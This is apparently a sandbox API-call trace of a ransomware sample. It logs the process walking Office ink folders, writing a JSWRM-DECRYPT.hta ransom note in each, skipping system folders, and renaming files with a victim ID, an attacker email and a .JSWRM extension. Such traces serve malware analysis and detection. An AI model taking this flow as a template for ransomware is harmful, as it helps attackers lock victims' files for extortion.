[0068.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\jswrm-decrypt.hta")) returned 0xffffffff [0068.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.596] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.596] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.600] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.601] CloseHandle (hObject=0x454) returned 1 [0068.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\jswrm-decrypt.hta")) returned 0x20 [0068.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.601] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076bff5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8af989, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0068.602] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.602] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076bff5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8af989, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.602] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.602] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.602] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8af989, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8af989, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8d5e5c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.602] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.602] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e90ce26, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e90ce26, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e90ce26, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.602] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.602] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.602] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.602] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.603] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.603] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.603] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.603] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.603] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.603] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.603] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10087469431378912) returned 0 [0068.603] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.603] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.603] CloseHandle (hObject=0xffffffff) returned 1 [0068.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0068.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0068.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0068.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.604] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.604] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e90ce26, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e90ce26, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e90ce26, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.604] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.604] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2=".") returned 1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2="..") returned 1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2="...") returned 1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2="windows") returned -1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2="recovery") returned -1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2="perflogs") returned -1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2="documents and settings") returned 1 [0068.604] lstrcmpiW (lpString1="nl-NL", lpString2="$RECYCLE.BIN") returned 1 [0068.605] lstrcmpiW (lpString1="nl-NL", lpString2="system volume information") returned -1 [0068.605] lstrcmpiW (lpString1="nl-NL", lpString2="msocache") returned 1 [0068.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\jswrm-decrypt.hta")) returned 0xffffffff [0068.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.606] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.606] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.607] CloseHandle (hObject=0x454) returned 1 [0068.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\jswrm-decrypt.hta")) returned 0x20 [0068.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.607] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8d5e5c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0068.608] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.608] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8d5e5c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.608] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.608] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.608] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8d5e5c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8d5e5c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8d5e5c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.608] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 